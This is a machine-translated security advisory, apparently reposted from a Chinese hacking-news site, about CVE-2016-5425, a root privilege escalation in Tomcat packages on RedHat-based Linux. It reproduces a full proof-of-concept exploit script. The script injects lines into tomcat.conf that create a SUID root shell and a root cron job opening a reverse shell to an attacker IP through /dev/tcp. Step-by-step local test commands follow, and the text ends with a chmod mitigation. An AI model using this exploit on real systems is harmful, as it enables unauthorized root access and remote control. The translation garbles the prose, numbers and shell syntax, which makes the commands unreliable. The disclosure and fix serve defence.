Lucene search

K
myhack58佚名MYHACK58:62201680097
HistoryOct 12, 2016 - 12:00 a.m.

Vulnerability and early warning: based on the RedHat distribution of Apache Tomcat local to mention the right vulnerability-vulnerability warning-the black bar safety net

2016-10-1200:00:00
佚名
www.myhack58.com
57

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

47.9%

Description
Tomcat recently always want to engage in some big news, a month are not to, Tomcat and burst vulnerability. 2 0 1 6 1 0 On 1 1 December, online broke the Tomcat local to mention the right vulnerability, vulnerability number CVE-2 0 1 6-5 4 2 and 5. This affected mainly is based on the RedHat distribution version of Apache Tomcat, including CentOS, RedHat And OracleLinux, Fedora, and so on. The main reason is the General Tomcat user has permissions to the/usr/lib/tmpfiles. d/tomcat. conf this configuration file is read, then the user group members or with the normal Tomcat permissions WebShell permissions can be elevated to root level.
Vulnerability description
Based on the RedHat release version of Tomcat after installing tomcat, set the user to tomcat. conf file has write permissions, as follows
[root@localhost ~]# ls-al /usr/lib/tmpfiles. d/tomcat. conf-rw-rw-r–. 1 root tomcat 4 3 May 1 2 2 0 1 5 /usr/lib/tmpfiles. d/tomcat. conf
tmpfiles. d directory where the configuration file is systemd-tmpfiles used to manage the temporary file, an attacker could very easily inject the malicious payload into the tomcat. conf file, such as a new rally SHELL, the new one has the SUID permission of a file. When/usr/bin/systemd-tmpfiles when executed, the injected payload will get executed.
In REDHAT distributions, the default boot, systemd-tmpfiles will by systemd-tmpfiles-setup. Service service to be implemented, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup. service |grep ExecStartExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depends on the system used, systemd-tmpfiles may also be through other services, cronjobs,startup scripts, and other ways to trigger. Worthy of note in another place is that systemd-tmpfiles will not because the configuration file syntax errors cause an error stop. Therefore an attacker can easily inject malicious PAYLOAD to/usr/lib/tmpfiles. d/tomcat. conf
According to the following POC, we can see that·is injected into tomcat. conf meaning is to bounce the SHELL, and the new one has the SUID permissions of the shell,in particular C, z,F meaning, The we can man 5 tmpfiles. d to view.
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bashz /usr/share/tomcat/rootsh 4 7 7 0 root root-F /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1
POC
-----------[ tomcat-RH-root.sh ]---------

#!/ bin/bash

Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit

CVE-2 0 1 6-5 4 2 5

Full advisory at:

http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html

Discovered and coded by:

Dawid Golunski

http://legalhackers.com

Tested on RedHat, CentOS, OracleLinux, Fedora systems.

For testing purposes only.

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9 0 9 0

echo-e “\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2 0 1 6-5 4 2 5 *”
echo-e “Discovered by Dawid Golunski\n”
echo “[+] Checking vulnerability”
ls-l /usr/lib/tmpfiles. d/tomcat. conf | grep ‘tomcat’
if [ $? -ne 0 ]; then
echo “Not vulnerable or the tomcat installed under a different user than ‘tomcat’”
exit 1
fi
echo-e “\n[+] Your system is vulnerable!”

echo-e “\n[+] Appending data to the /usr/lib/tmpfiles. d/tomcat. conf…”
cat>/usr/lib/tmpfiles. d/tomcat. conf
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -“* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1 & \n\n”
eof

echo “[+] /usr/lib/tmpfiles. d/tomcat. conf contains:”
cat /usr/lib/tmpfiles. d/tomcat. conf
echo-e “\n[+] Payload injected! Wait for your root shell…\n”
echo-e “Once ‘/usr/bin/systemd-tmpfiles --create’ gets executed (on reboot by tmpfiles-setup. service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n”
--------------[ eof]--------------------
Local test:

  1. First determine the next local LINUX release version and TOMCAT version.
    ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 2 1 5 3 0 4 3 5 4 2. png? www. myhack58. com)
  2. Switch to the tomcat group permissions, additional malicious payload to/usr/lib/tmpfiles. d/tomcat. conf file
    ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 2 1 5 3 0 4 4 9 2 6. png? www. myhack58. com)
    cat>/usr/lib/tmpfiles. d/tomcat. confF /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/192.168.1.3/9 9 9 9 0&1 & \n\n"eof
  3. root permissions manually trigger/usr/bin/systemd-tmpfiles –create [this step is relatively tasteless, dependent on the system to have other services, cronjobs,start the script to trigger, if the system has, the better, if not, this vulnerability is relative used to say, you need to trigger systemd-tmpfiles, a bit tasteless]
    [root@localhost Desktop]# /usr/bin/systemd-tmpfiles --create
  4. Get the bounce ROOT access SHELL
    Vulnerability
    The attacker may have a tomcat permissions, by rewriting the configuration file to achieve local mention of the right to ROOT access. If a remote attacker conjunction with a specific WEB application vulnerabilities, but also can achieve remote use.
    Affected version
    CentOS
    Fedora
    Oracle Linux
    RedHat
    Redhat official website details:https://access. redhat. com/security/cve/CVE-2 0 1 6-5 4 2 5
    Solutions
    Temporary repair recommendations
    You can adjust the/usr/lib/tmpfiles. d/tomcat. conf permissions, remove tomcat the Group’s write permissions.
    chmod 6 4 4 /usr/lib/tmpfiles. d/tomcat. conf
    Updated with the latest Tomcat package
    The Redhat security team has been in the first time to repair the affected Tomcat upstream package,to directly update the release version provided by Tomcat.

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

47.9%